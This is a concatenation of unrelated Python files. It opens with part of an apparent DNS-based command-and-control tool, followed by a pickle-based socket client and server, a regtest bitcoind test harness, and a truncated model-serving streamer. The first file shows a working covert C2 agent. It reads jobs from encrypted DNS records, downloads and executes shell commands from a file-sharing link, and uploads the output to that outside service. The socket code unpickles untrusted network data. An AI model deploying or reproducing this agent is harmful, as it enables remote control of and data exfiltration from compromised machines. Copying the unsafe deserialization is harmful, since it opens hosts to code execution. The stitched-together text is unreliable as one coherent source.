# This is dependent on how it was encoded by the origin
originaldata = data.decode('ascii')
return originaldata
def fx_selector_from_key(self, key, domain, fqdn=False):
""" Build DKIM selector from key"""
if not fqdn:
selector = ".".join([key, "_domainkey"])
else:
selector = ".".join([key, "_domainkey", domain])
return selector
def fx_send_file(self, service, sfile):
""" Send file the send service via sendlclient """
self.flogger.debug('SF: Uploading "' + sfile.name + '"')
        # Ignore a potentially incompatible server version. Set `ignoreVersion=False` to enforce the check.
ffsend_link, fileId, delete_token = sendclient.upload.send_file(
service, sfile, ignoreVersion=True, fileName=None)
self.flogger.debug('SF: File Uploaded, use the following link to retrieve it')
self.flogger.debug("SF: Link: {0}, FileId: {1}, Delete file with key: {2}".format(
ffsend_link,fileId, delete_token))
self.flogger.debug(ffsend_link)
return ffsend_link
def fx_url_to_file(self, url, dfile=None, temp=False):
""" Get URL from the send service via sendlclient """
# Ignore potentially incompatible version of server. Turn `ignoreVersion to True` to care
tmpfile, suggested_name = sendclient.download.send_urlToFile(url, ignoreVersion=True)
print("Suggested name: ", suggested_name)
self.flogger.debug('SF: Downloaded {0} -> {1}'.format(url, tmpfile.name))
if dfile is not None:
self.flogger.debug("SF: Renaming and Saving {0} -> {1}".format(tmpfile.name, dfile.name))
rename(tmpfile.name, dfile.name)
return path.abspath(dfile.name)
else:
if not temp:
self.flogger.debug("SF: Renaming and Saving {0} -> {1}".format(tmpfile.name, suggested_name))
try:
rename(tmpfile.name, suggested_name)
return path.abspath(suggested_name)
except OSError as ose:
print("Unable to save file {} : \nLeaving it under `unknown` ".format(
suggested_name, ose))
suggested_name = "unknown"
rename(tmpfile.name, suggested_name)
return path.abspath(suggested_name)
else:
fd, tf = tempfile.mkstemp()
rename(tmpfile.name, tf)
return path.abspath(tf)
def agent_peek(self):
""" Peek: See unwrapped and decrypted payload """
if hasattr(self.fconfig['args'], 'interval_low') and \
hasattr(self.fconfig['args'], 'interval_high') and \
(self.fconfig['args'].interval_low > 0 or self.fconfig['args'].interval_high > 0):
while True:
data = self.fx_get_payload(self.fconfig['key'], self.fconfig['domain'])
self.flogger.info(data)
sleep(randint(self.fconfig['args'].interval_low,
self.fconfig['args'].interval_high))
elif 'peek_watch' in self.fconfig:
while True:
data = self.fx_get_payload(self.fconfig['key'], self.fconfig['domain'])
self.flogger.info(data)
sleep(int(self.fconfig['watch']))
else:
data = self.fx_get_payload(self.fconfig['key'], self.fconfig['domain'])
return data
def agent_ident(self):
""" Ident: Identify agent in DNS """
data = "Agent: ID:{0} >> RR:{1} @{2} ".format(
self.fconfig['agent'].decode(),
self.fx_agent_ident(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['nssrv'] )
return data
def agent_show(self):
""" Show: Show DNS record value (wrapped and encrypted payload) """
data = self.fx_check_payload(self.fconfig['key'], self.fconfig['domain'])
return data
def agent_check(self):
"""Check if agent record exists, and if not - notify and bail"""
record = self.fx_check_agent(self.fconfig['key'], self.fconfig['domain'])
if record is None:
self.flogger.warning("FX: Agent {0} not known to the system (key: {1})".format(
self.fconfig['agent'].decode(), self.fconfig['key']))
self.flogger.warning("FX: Invoke `agent` action with `--operation generate` option")
def agent_reset(self):
msgMeta = {'t': 's', 's': 'W', 'c': '', 'u': ''}
record = self.fx_check_agent(self.fconfig['key'], self.fconfig['domain'])
if record is not None:
jmsgMeta = json.dumps(msgMeta, separators=(',', ':'))
payload_b64 = self.fx_penc(self.fconfig['key'], jmsgMeta)
self.fx_agent_dynrec("update", self.fconfig['domain'], self.fconfig['nssrv'],
self.fx_selector_from_key(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['ttl'], payload_b64, **self.fconfig['tsig'])
else:
self.flogger.warning("FX: Agent record {0} does not exist. Create it first".format(
self.fconfig['agent'].decode()))
def agent_generate(self):
"""Check if agent record exists, and if not - generate one"""
record = self.fx_check_agent(self.fconfig['key'], self.fconfig['domain'])
if record is not None:
self.flogger.error("FX: Agent record already exists. Delete it first")
self.flogger.error("FX: Agent record is: {0} >> {1} @{2} ".format(
self.fconfig['agent'].decode(),
self.fx_agent_ident(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['nssrv'],
))
else:
self.flogger.warning("FX: New Agent record {0} will be GENERATED.".format(
self.fconfig['agent'].decode()))
msgMeta = {'t': 's', 's': 'W', 'c': '', 'u': ''}
jmsgMeta = json.dumps(msgMeta, separators=(',', ':'))
payload_b64 = self.fx_penc(self.fconfig['key'], jmsgMeta)
self.fx_agent_dynrec("add", self.fconfig['domain'], self.fconfig['nssrv'],
self.fx_selector_from_key(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['ttl'], payload_b64, **self.fconfig['tsig'])
def agent_delete(self):
"""Delete agent record"""
record = self.fx_check_agent(self.fconfig['key'], self.fconfig['domain'])
if record is not None:
self.flogger.warning("FX: Agent record {0} will be DELETED ".format(
self.fconfig['agent'].decode()))
self.flogger.warning("FX: Agent: {0} >> {1} @{2} ".format(
self.fconfig['agent'].decode(),
self.fx_agent_ident(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['nssrv'],
))
payload_b64 = self.fx_penc(self.fconfig['key'], "Not important, deleted")
self.fx_agent_dynrec("delete", self.fconfig['domain'], self.fconfig['nssrv'],
self.fx_selector_from_key(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['ttl'], payload_b64, **self.fconfig['tsig'])
else:
self.flogger.error("FX: Agent record does not exist.")
def _action_recv_master(self, agent_job):
# Process instruction metadata
# Process type response
if agent_job["t"].lower() == "s":
self.flogger.debug("Response received.")
# Fetch instructions from FFSend url
job_url = agent_job['u']
self.flogger.debug("Job Response Content URL: {0}".format(job_url))
# no URL posted from agent
if job_url == "":
return
fpath = self.fx_url_to_file(job_url, temp=True)
self.flogger.debug("Find downloaded response file in: " + fpath)
# Determine how to process downloaded file
# 'o' - output from command: cat to stdout
if agent_job["c"].lower() == "o":
with open(fpath, mode="rb") as cf:
print(cf.read().decode('utf-8'))
os.remove(fpath)
# TODO: Notify agent of a pickup by master
self.agent_reset()
elif agent_job["t"].lower() == "q":
self.flogger.debug("Request received. But your Role is Master.")
else:
self.flogger.error("Invalid Instruction: Not a request | response type")
def _action_recv_slave(self, agent_job):
# Process instruction metadata
# Process type request
if agent_job["t"].lower() == "q":
self.flogger.debug("Request received")
# Fetch instructions from FFSend url
job_url = agent_job['u']
self.flogger.debug("Job URL: {0}".format(type(job_url)))
if job_url is None:
return
# TODO: Implement data file download
if agent_job["c"].lower() == "f":
self.flogger.debug("Request received: data file download")
fpath = self.fx_url_to_file(job_url)
self.flogger.debug("Data file fetched: {}".format(fpath))
# Update DNS record meta only. Download of content only, no output
self.action_send_response("AWAIT", 'o', None, True)
if agent_job["c"].lower() == "o":
self.flogger.debug("Request received: external command exec()")
# Update DNS record meta only. Processing
self.flogger.debug("Setting ABUSY flag in record")
self.action_send_response("ABUSY", 'o', None, True)
fpath = self.fx_url_to_file(job_url, temp=True)
self.flogger.debug("Reading from: {}".format(fpath))
with open(fpath, mode="rb") as cf:
instructions = cf.read().decode('utf-8')
os.remove(fpath)
self.flogger.info("\n==> Request: ({}) <==".format(instructions))
self.flogger.debug("Instructions requested: \n{0}".format(instructions))
# Run command(s) from file
c = delegator.chain(instructions)
cout = c.out
output = "\n".encode('ascii') + cout.encode('ascii', 'replace')
# Update DNS record with results
print("<== Response posted ==>\n")
self.action_send_response("AWAIT", 'o', output)
# TODO: Implement internal agent commands
if agent_job["c"].lower() == "m":
self.flogger.debug("Request received: internal command")
self.flogger.error("NOT IMPLEMENTED")
elif agent_job["t"].lower() == "s":
self.flogger.debug("Response received. But your Role is Slave.")
else:
self.flogger.error("Invalid Instruction: Not a request | response type")
def action_recv(self):
"""
1. Receive data from DNS Store.
2. Follow processing instructions.
3. Update DNS Store record with response
"""
# Receive instruction data
recv_data = self.agent_peek()
self.flogger.debug("FX: Received Unwrapped data: {0}".format(recv_data))
agent_job = json.loads(recv_data)
self.flogger.debug("Agent job: {0}".format(agent_job))
if self.fconfig['verbose'] == 'debug':
for k, v in agent_job.items():
self.flogger.debug("{0} : {1}".format(k, v))
# process as slave
if self.fconfig['role'] == 'slave':
# Agent will only process jobs in SJOB(J) state
if agent_job["s"].upper() != "J":
self.flogger.info("No Job posted for agent")
self.flogger.debug("Record Data: {}".format(recv_data))
return
self._action_recv_slave(agent_job)
# process as master
if self.fconfig['role'] == 'master':
# Agent will only process jobs not in ABUSY(B) or AWAIT(W) states
if agent_job["s"].upper() != "W":
self.flogger.info("Agent is busy or pending job pick up.")
self.flogger.debug("Record Data: {}".format(recv_data))
return
self._action_recv_master(agent_job)
def action_send_response(self, jobstate, response_type, dmsgcontent=None, metaonly=False):
""" Send response to Store"""
ffsend_link = ""
msgMeta=None
# set state to AWAIT (free) or ABUSY (processing)
if jobstate == "AWAIT":
msgMeta = {'t': 's', 's': 'W', 'c': '', 'u': ''}
if jobstate == "ABUSY":
msgMeta = {'t': 's', 's': 'B', 'c': '', 'u': ''}
# TODO: Implement file exfil
if response_type == 'o': # output command
msgMeta['c'] = 'o'
if not metaonly:
if dmsgcontent is not None:
with tempfile.NamedTemporaryFile() as tf:
tf.write(dmsgcontent)
tf.seek(0)
ffsend_link = self.fx_send_file(self.fconfig['service'], tf)
self.flogger.debug("Serve: Retrieve response at: " + ffsend_link)
msgMeta['u'] = ffsend_link
# package metadata
jmsgMeta = json.dumps(msgMeta, separators=(',', ':'))
payload_b64 = self.fx_penc(self.fconfig['key'], jmsgMeta)
self.fx_agent_dynrec("update", self.fconfig['domain'], self.fconfig['nssrv'],
self.fx_selector_from_key(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['ttl'], payload_b64, **self.fconfig['tsig'])
def action_send_file(self, dfh, meta):
""" Send file to Frefox Send service"""
ffsend_link = ""
ffsend_link = self.fx_send_file(self.fconfig['service'], dfh)
self.flogger.debug("Retrieve with: " + ffsend_link)
meta['u'] = ffsend_link
jmeta = json.dumps(meta, separators=(',', ':'))
payload_b64 = self.fx_penc(self.fconfig['key'], jmeta)
self.fx_agent_dynrec("update", self.fconfig['domain'], self.fconfig['nssrv'],
self.fx_selector_from_key(self.fconfig['key'], self.fconfig['domain']),
self.fconfig['ttl'], payload_b64, **self.fconfig['tsig'])
def action_send_cmd(self, meta, content):
""" Convert command to file"""
with tempfile.NamedTemporaryFile() as tf:
tf.write(content)
tf.seek(0)
self.action_send_file(tf, meta)
def action_send_data_file(self, dfh):
""" Send data file to Agent """
msgMeta = {'t': 'q', 's': 'J', 'c': 'f', 'u': ''}
self.action_send_file(dfh, msgMeta)
def action_send_ocmd_file(self, dfh):
"""" Send file wth command for execution to Agent """
msgMeta = {'t': 'q', 's': 'J', 'c': 'o', 'u': ''}
self.action_send_file(dfh, msgMeta)
def action_send_ocmd(self, dmsgcontent):
""" Send <external> command for execution to Agent """
msgMeta = {'t': 'q', 's': 'J', 'c': 'o', 'u': ''}
self.action_send_cmd(msgMeta, dmsgcontent)
def action_send_mcmd(self, dmsgcontent):
""" Send <internal> command for execution to Agent """
msgMeta = {'t': 'q', 's': 'J', 'c': 'm', 'u': ''}
self.action_send_cmd(msgMeta, dmsgcontent)
def action_console(self):
""" Enter console """
print('Starting Command server, use <Ctrl-D> , `q`, `quit` to quit')
cst = threading.Thread(target=self.cmdservice_worker, args=(self.fconfig, self))
cst.start()
def cmdservice_worker(self, fconfig, fox):
fcc = FConCommander(fconfig, fox)
fcc.do_loop()
def fpath2fh(self, fpath):
if os.path.exists(fpath) and os.path.isfile(fpath):
try:
fh = open(fpath, 'rb')
except IOError as ioe:
self.flogger.error("File {} could not be opened: {}".format(fpath, ioe ))
print("File {} could not be opened: {}".format(fpath, ioe ))
return None
return fh
else:
self.flogger.error("Path {} does not exist".format(fpath))
print("Path {} does not exist".format(fpath))
return None
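# --- Hedged usage sketch (not part of the original Foxtrot API) ---
# Round-trips the payload format used by fx_penc/fx_pdec above:
# urlsafe_b64( nonce(16) | tag(16) | ciphertext ) with AES in EAX mode.
# The 32-character key and the JSON snippet are made-up placeholders, and the
# sketch assumes the module's own imports (AES, BytesIO, base64 helpers) resolve.
if __name__ == "__main__":
    _demo_key = "0123456789abcdef0123456789abcdef"
    _cipher = AES.new(_demo_key.encode(), AES.MODE_EAX)
    _ct, _tag = _cipher.encrypt_and_digest(b'{"t":"q","s":"J","c":"o","u":""}')
    _payload_b64 = urlsafe_b64encode(_cipher.nonce + _tag + _ct).decode('ascii')
    _stream = BytesIO(urlsafe_b64decode(_payload_b64))
    _nonce, _tag, _ct = [_stream.read(x) for x in (16, 16, -1)]
    _plain = AES.new(_demo_key.encode(), AES.MODE_EAX, _nonce).decrypt_and_verify(_ct, _tag)
    print(_plain.decode('ascii'))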
|
connection.py
|
import crypttools as crypt
import socket
import threading
import pickle
import handle
import time
class ErrorDisconnectedFromServer(Exception):
pass
class ErrorReceivingMessage(Exception):
pass
class ErrorSendingMessage(Exception):
pass
class ErrorMessageNotFromServer(Exception):
pass
class ErrorConnectingToServer(Exception):
pass
__HEADER_SIZE__ = 4
__HEADER_AMOUNT__ = 4
class Client:
def __init__(self, ip, port, onReceive=lambda x: None):
self.ip = ip
self.port = port
self.uid = crypt.strHash(str(self.ip) + '$@lt' + str(self.port))
self.connected = False
self.connection = None
self.onReceive = onReceive
self.timeLast = time.time()
def _dict_wrapper(self, data, type_='data'):
return {
'uid': self.uid,
'time': time.time(),
'payload': data,
'type': type_
}
def _receive_once(self):
try:
            received = self.connection.recv(__HEADER_SIZE__)
            #print("Client got data amount:", received)
            if received == b'':
                # an empty read means the server closed the connection
                return
            received = int(received)
mes = None
try:
data = self.connection.recv(received)
mes = pickle.loads(data)
mes = handle.Message(mes)
except Exception as e:
print("Error:", e)
mes = None
if mes is not None:
self.onReceive(mes)
except:
print("Closing...")
self.connection.close()
raise ErrorDisconnectedFromServer
def _rec_forever(self):
assert self.connected
while True:
self._receive_once()
def connect(self):
assert not self.connected
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.connection.connect((str(self.ip), int(self.port)))
self.connected = True
except:
self.connected = False
self.connection = None
raise ErrorConnectingToServer
def send(self, data):
assert self.connected
wrapper = self._dict_wrapper(data)
dumped_wrapper = pickle.dumps(wrapper)
try:
x = str(len(dumped_wrapper)).encode().rjust(4, b'0')
#print("Client sent packet with length:", x)
self.connection.sendall(x + dumped_wrapper)
except:
raise ErrorSendingMessage
def start(self):
assert not self.connected
self.connect()
self.rec_thread = threading.Thread(target=self._rec_forever)
self.rec_thread.start()
class Server:
def __init__(self, port, onReceive=lambda x, y: None, _newthread_client=True):
self.port = port
self.ip = ''
self.started = False
self._clients = []
self._clientthreads = []
self.clients = []
self.onReceive = onReceive
        self._newthread_client = _newthread_client
def _handle_single(self, client):
while True:
numchars = client.recv(__HEADER_AMOUNT__)
if numchars == b'':
                # an empty read means this client disconnected; stop handling it
                break
#print("Server numchars recv len:", numchars)
numchars = int(numchars)
data = client.recv(numchars)
if not data == b'':
data = pickle.loads(data)
#print(data, type(data))
self.onReceive(data, self._clients)
def _handle_all(self):
clientmax = len(self._clients)
for client in range(clientmax):
try:
c = self._clients[client]
things = c.recv(__HEADER_AMOUNT__)
if things == b'':
continue
chars = int(things)
data = c.recv(chars)
#print("Number of characters:", chars)
if not data == b'':
data = pickle.loads(data)
self.onReceive(data, self._clients)
except Exception:
print("Handle-all got error")
def _handle_forever(self):
while True:
self._handle_all()
def _accept_once(self):
#print("before accept")
client, address = self.listener.accept()
self._clients.append(client)
print("Got client: %s" % client)
#print("after accept")
def _accept_forever(self):
while True:
self._accept_once()
def _accept_newthread_forever(self):
while True:
#print("newthread -- before accept")
client, address = self.listener.accept()
self._clients.append(client)
point = len(self._clientthreads)
print("Got client:", client)
self._clientthreads.append(threading.Thread(target=self._handle_single, args = (client, )))
self._clientthreads[point].start()
def start(self):
assert not self.started
self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listener.bind((self.ip, self.port))
self.listener.listen(5)
print("Server successfully created on port %s" % self.port)
if not self._newthread_client:
self.acceptThread = threading.Thread(target=self._accept_forever)
self.acceptThread.start()
self.handleThread = threading.Thread(target=self._handle_forever)
self.handleThread.start()
else:
self.acceptThread = threading.Thread(target=self._accept_newthread_forever)
self.acceptThread.start()
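# --- Hedged framing sketch (illustration only, not part of the original API) ---
# Client.send() and the Server handlers above frame every pickled message with a
# zero-padded ASCII length prefix of __HEADER_SIZE__ characters. This shows the
# same packing/unpacking on a plain bytes buffer, without any sockets.
if __name__ == "__main__":
    demo_message = {'uid': 'demo', 'time': time.time(), 'payload': 'hello', 'type': 'data'}
    demo_body = pickle.dumps(demo_message)
    demo_frame = str(len(demo_body)).encode().rjust(__HEADER_SIZE__, b'0') + demo_body
    demo_length = int(demo_frame[:__HEADER_SIZE__])
    assert pickle.loads(demo_frame[__HEADER_SIZE__:__HEADER_SIZE__ + demo_length]) == demo_message
    print("framed %d bytes, round-trip ok" % demo_length)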
|
bitcoind.py
|
import decimal
import json
import logging
import os
import threading
from cheroot.wsgi import Server
from decimal import Decimal
from ephemeral_port_reserve import reserve
from flask import Flask, request, Response
from test_framework.authproxy import AuthServiceProxy, JSONRPCException
from test_framework.utils import TailableProc, wait_for, TIMEOUT, BITCOIND_PATH, COIN
class BitcoindRpcInterface:
def __init__(self, data_dir, network, rpc_port):
self.cookie_path = os.path.join(data_dir, network, ".cookie")
self.rpc_port = rpc_port
self.wallet_name = "revaultd-tests"
def __getattr__(self, name):
assert not (name.startswith("__") and name.endswith("__")), "Python internals"
with open(self.cookie_path) as fd:
authpair = fd.read()
service_url = (
f"http://{authpair}@localhost:{self.rpc_port}/wallet/{self.wallet_name}"
)
proxy = AuthServiceProxy(service_url, name)
def f(*args):
return proxy.__call__(*args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir, rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.p2pport = reserve()
self.prefix = "bitcoind"
regtestdir = os.path.join(bitcoin_dir, "regtest")
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
BITCOIND_PATH,
"-datadir={}".format(bitcoin_dir),
"-printtoconsole",
"-server",
]
bitcoind_conf = {
"port": self.p2pport,
"rpcport": rpcport,
"debug": 1,
"fallbackfee": Decimal(1000) / COIN,
"rpcthreads": 32,
}
self.conf_file = os.path.join(bitcoin_dir, "bitcoin.conf")
with open(self.conf_file, "w") as f:
f.write("chain=regtest\n")
f.write("[regtest]\n")
for k, v in bitcoind_conf.items():
f.write(f"{k}={v}\n")
self.rpc = BitcoindRpcInterface(bitcoin_dir, "regtest", rpcport)
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
self.rpc.stop()
return TailableProc.stop(self)
# wait_for_mempool can be used to wait for the mempool before generating
# blocks:
    # True := wait for at least 1 transaction
    # int > 0 := wait for at least N transactions
    # 'tx_id' := wait for one transaction id given as a string
    # ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
    #                         are in the mempool
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(
lambda: all(
txid in self.rpc.getrawmempool() for txid in wait_for_mempool
)
)
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
old_blockcount = self.rpc.getblockcount()
addr = self.rpc.getnewaddress()
self.rpc.generatetoaddress(numblocks, addr)
wait_for(lambda: self.rpc.getblockcount() == old_blockcount + numblocks)
def get_coins(self, amount_btc):
        # the subsidy halves every 150 blocks on regtest; this is a rough
        # estimate to avoid looping in most cases
numblocks = amount_btc // 25 + 1
while self.rpc.getbalance() < amount_btc:
self.generate_block(numblocks)
def generate_blocks_censor(self, n, txids):
"""Generate {n} blocks ignoring {txids}"""
fee_delta = 1000000
for txid in txids:
self.rpc.prioritisetransaction(txid, None, -fee_delta)
self.generate_block(n)
for txid in txids:
self.rpc.prioritisetransaction(txid, None, fee_delta)
def generate_empty_blocks(self, n):
"""Generate {n} empty blocks"""
addr = self.rpc.getnewaddress()
for _ in range(n):
self.rpc.generateblock(addr, [])
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height={height} and:
- If shift >=0:
- re-mine all mempool transactions into {height} + shift
(with shift floored at 1)
- Else:
- don't re-mine the mempool transactions
Note that tx's that become invalid at {height} (because coin maturity,
locktime etc.) are removed from mempool. The length of the new chain
will be original + 1 OR original + {shift}, whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1,
use {height}=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can
be pulled forward to h1.
2. Set {height}=h2 and {shift}= h1-h2
"""
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
if height + shift > orig_len:
final_len = height + shift
else:
final_len = 1 + orig_len
self.rpc.invalidateblock(old_hash)
self.wait_for_log(
r"InvalidChainFound: invalid block=.* height={}".format(height)
)
memp = self.rpc.getrawmempool()
if shift < 0:
self.generate_empty_blocks(1 + final_len - height)
elif shift == 0:
self.generate_block(1 + final_len - height, memp)
else:
self.generate_empty_blocks(shift)
self.generate_block(1 + final_len - (height + shift), memp)
self.wait_for_log(r"UpdateTip: new best=.* height={}".format(final_len))
def startup(self):
try:
self.start()
except Exception:
self.stop()
raise
info = self.rpc.getnetworkinfo()
if info["version"] < 220000:
self.rpc.stop()
raise ValueError(
"bitcoind is too old. Minimum supported version is 0.22.0."
" Current is {}".format(info["version"])
)
def cleanup(self):
try:
self.stop()
except Exception:
self.proc.kill()
self.proc.wait()
class DecimalEncoder(json.JSONEncoder):
"""By default json.dumps does not handle Decimals correctly, so we override its handling"""
def default(self, o):
if isinstance(o, decimal.Decimal):
return float(o)
return super(DecimalEncoder, self).default(o)
class BitcoindRpcProxy(object):
"""A proxy to the bitcoind RPC interface that can replace commands with arbitrary results.
Starts a HTTP server in a thread, listens for incoming JSONRPC requests, and responds with
either a mocked result or the result it got from bitcoind.
This was taken and adapted from the C-lightning test suite.
"""
def __init__(self, bitcoind_rpc_port, bitcoind_cookie_path, mocks):
self.app = Flask("BitcoindProxy")
self.app.add_url_rule(
"/",
"Entrypoint",
self.proxy,
methods=["POST"],
defaults={"path": ""},
)
self.app.add_url_rule(
"/<path:path>",
"Entrypoint",
self.proxy,
methods=["POST"],
)
self.rpcport = reserve()
# A mapping from method name to result as a dict.
# Eventually, the results could be callable.
self.mocks = mocks
self.bitcoind_rpc_port = bitcoind_rpc_port
self.bitcoind_cookie_path = bitcoind_cookie_path
self.start()
def __del__(self):
self.stop()
def _handle_request(self, r, path):
"""Handle a JSONRPC request {r} made to the HTTP endpoint {path} (to handle
wallet paths)"""
method = r["method"]
# If we have set a mock for this method reply with that
if method in self.mocks:
return {"id": r["id"], "error": None, "result": self.mocks[method]}
# Otherwise, just forward the request
with open(self.bitcoind_cookie_path) as fd:
authpair = fd.read()
service_url = f"http://{authpair}@localhost:{self.bitcoind_rpc_port}/{path}"
try:
res = AuthServiceProxy(service_url, r["method"])(*r["params"])
return {"result": res, "id": r["id"]}
except JSONRPCException as e:
return {"error": e.error, "id": r["id"]}
def proxy(self, path):
r = json.loads(request.data.decode("ASCII"))
if isinstance(r, list):
reply = [self._handle_request(subreq, path) for subreq in r]
else:
reply = self._handle_request(r, path)
# \r\n because rust-jsonrpc expects it..
response = Response(json.dumps(reply, cls=DecimalEncoder) + "\r\n")
response.headers["Content-Type"] = "application/json"
return response
def start(self):
self.server = Server(
("127.0.0.1", self.rpcport),
self.app,
numthreads=32,
request_queue_size=10,
accepted_queue_timeout=20,
timeout=TIMEOUT * 2,
)
self.proxy_thread = threading.Thread(target=self.server.start)
self.proxy_thread.daemon = True
self.proxy_thread.start()
# Now that bitcoind is running on the real rpcport, let's tell all
# future callers to talk to the proxyport. We use the bind_addr as a
# signal that the port is bound and accepting connections.
while self.server.bind_addr[1] == 0:
pass
self.rpcport = self.server.bind_addr[1]
def stop(self):
self.server.stop()
self.proxy_thread.join()
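# --- Hedged usage sketch (illustration only; assumes the test framework imports
# above resolve) ---
# DecimalEncoder is what lets json.dumps serialize the Decimal amounts bitcoind
# returns; the proxy encodes both mocked and forwarded replies with it, followed
# by the "\r\n" that rust-jsonrpc expects.
if __name__ == "__main__":
    demo_reply = {"id": 1, "error": None, "result": decimal.Decimal("0.00001")}
    print(json.dumps(demo_reply, cls=DecimalEncoder) + "\r\n")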
|
service_streamer.py
|
# coding=utf-8
# Created by Meteorix at 2019/7/13
import logging
import multiprocessing
import os
import threading
import time
import uuid
import weakref
import pickle
from queue import Queue, Empty
from typing import List
from redis import Redis
from .managed_model import ManagedModel
TIMEOUT = 1
TIME_SLEEP = 0.001
WORKER_TIMEOUT = 20
logger = logging.getLogger(__name__)
logger.setLevel("INFO")
mp = multiprocessing.get_context("spawn")
class Future(object):
def __init__(self, task_id, task_size, future_cache_ref):
self._id = task_id
self._size = task_size
self._future_cache_ref = future_cache_ref
self._outputs = []
self._finish_event = threading.Event()
def result(self, timeout=None):
if self._size == 0:
self._finish_event.set()
return []
finished = self._finish_event.wait(timeout)
if not finished:
raise TimeoutError("Task: %d Timeout" % self._id)
# remove from future_cache
future_cache = self._future_cache_ref()
if future_cache is not None:
del future_cache[self._id]
# [(request_id, output), ...] sorted by request_id
self._outputs.sort(key=lambda i: i[0])
# restore batch result from outputs
batch_result = [i[1] for i in self._outputs]
return batch_result
def done(self):
        return self._finish_event.is_set()
def _append_result(self, it_id, it_output):
self._outputs.append((it_id, it_output))
if len(self._outputs) >= self._size:
self._finish_event.set()
class _FutureCache(dict):
"Dict for weakref only"
pass
class _BaseStreamer(object):
def __init__(self, *args, **kwargs):
super().__init__()
self._client_id = str(uuid.uuid4())
self._task_id = 0
self._future_cache = _FutureCache() # {task_id: future}
self.back_thread = threading.Thread(target=self._loop_collect_result, name="thread_collect_result")
self.back_thread.daemon = True
def _delay_setup(self):
self.back_thread.start()
def _send_request(self, task_id, request_id, model_input):
raise NotImplementedError
def _recv_response(self, timeout=TIMEOUT):
raise NotImplementedError
def _input(self, batch: List) -> int:
"""
input a batch, distribute each item to mq, return task_id
"""
# task id in one client
task_id = self._task_id
self._task_id += 1
# request id in one task
request_id = 0
future = Future(task_id, len(batch), weakref.ref(self._future_cache))
self._future_cache[task_id] = future
for model_input in batch:
self._send_request(task_id, request_id, model_input)
request_id += 1
return task_id
def _loop_collect_result(self):
logger.info("start _loop_collect_result")
while True:
message = self._recv_response(timeout=TIMEOUT)
if message:
(task_id, request_id, item) = message
future = self._future_cache[task_id]
future._append_result(request_id, item)
else:
# todo
time.sleep(TIME_SLEEP)
def _output(self, task_id: int) -> List:
future = self._future_cache[task_id]
batch_result = future.result(WORKER_TIMEOUT)
return batch_result
def submit(self, batch):
task_id = self._input(batch)
future = self._future_cache[task_id]
return future
def predict(self, batch):
task_id = self._input(batch)
ret = self._output(task_id)
return ret
def destroy_workers(self):
raise NotImplementedError
class _BaseStreamWorker(object):
def __init__(self, predict_function, batch_size, max_latency, *args, **kwargs):
super().__init__()
assert callable(predict_function)
self._pid = os.getpid()
self._predict = predict_function
self._batch_size = batch_size
self._max_latency = max_latency
self._destroy_event = kwargs.get("destroy_event", None)
def run_forever(self, *args, **kwargs):
self._pid = os.getpid() # overwrite the pid
logger.info("[gpu worker %d] %s start working" % (self._pid, self))
while True:
handled = self._run_once()
if self._destroy_event and self._destroy_event.is_set():
break
if not handled:
# sleep if no data handled last time
time.sleep(TIME_SLEEP)
logger.info("[gpu worker %d] %s shutdown" % (self._pid, self))
def model_predict(self, batch_input):
batch_result = self._predict(batch_input)
return batch_result
def _run_once(self):
batch = []
start_time = time.time()
for i in range(self._batch_size):
try:
item = self._recv_request(timeout=self._max_latency)
except TimeoutError:
                # waiting for this item exceeded the max latency
break
else:
batch.append(item)
if (time.time() - start_time) > self._max_latency:
# total batch time exceeds the max latency
break
if not batch:
return 0
model_inputs = [i[3] for i in batch]
model_outputs = self.model_predict(model_inputs)
# publish results to redis
for i, item in enumerate(batch):
client_id, task_id, request_id, _ = item
self._send_response(client_id, task_id, request_id, model_outputs[i])
batch_size = len(batch)
logger.info("[gpu worker %d] run_once batch_size: %d start_at: %s spend: %s" % (
self._pid, batch_size, start_time, time.time() - start_time))
return batch_size
def _recv_request(self, timeout=TIMEOUT):
raise NotImplementedError
def _send_response(self, client_id, task_id, request_id, model_input):
raise NotImplementedError
class ThreadedStreamer(_BaseStreamer):
def __init__(self, predict_function, batch_size, max_latency=0.1):
super().__init__()
self._input_queue = Queue()
self._output_queue = Queue()
self._worker_destroy_event=threading.Event()
self._worker = ThreadedWorker(predict_function, batch_size, max_latency,
self._input_queue, self._output_queue,
destroy_event=self._worker_destroy_event)
self._worker_thread = threading.Thread(target=self._worker.run_forever, name="thread_worker")
self._worker_thread.daemon = True
self._worker_thread.start()
self._delay_setup()
def _send_request(self, task_id, request_id, model_input):
self._input_queue.put((0, task_id, request_id, model_input))
def _recv_response(self, timeout=TIMEOUT):
try:
message = self._output_queue.get(timeout=timeout)
except Empty:
message = None
return message
def destroy_workers(self):
self._worker_destroy_event.set()
self._worker_thread.join(timeout=WORKER_TIMEOUT)
if self._worker_thread.is_alive():
raise TimeoutError("worker_thread destroy timeout")
logger.info("workers destroyed")
class ThreadedWorker(_BaseStreamWorker):
def __init__(self, predict_function, batch_size, max_latency, request_queue, response_queue, *args, **kwargs):
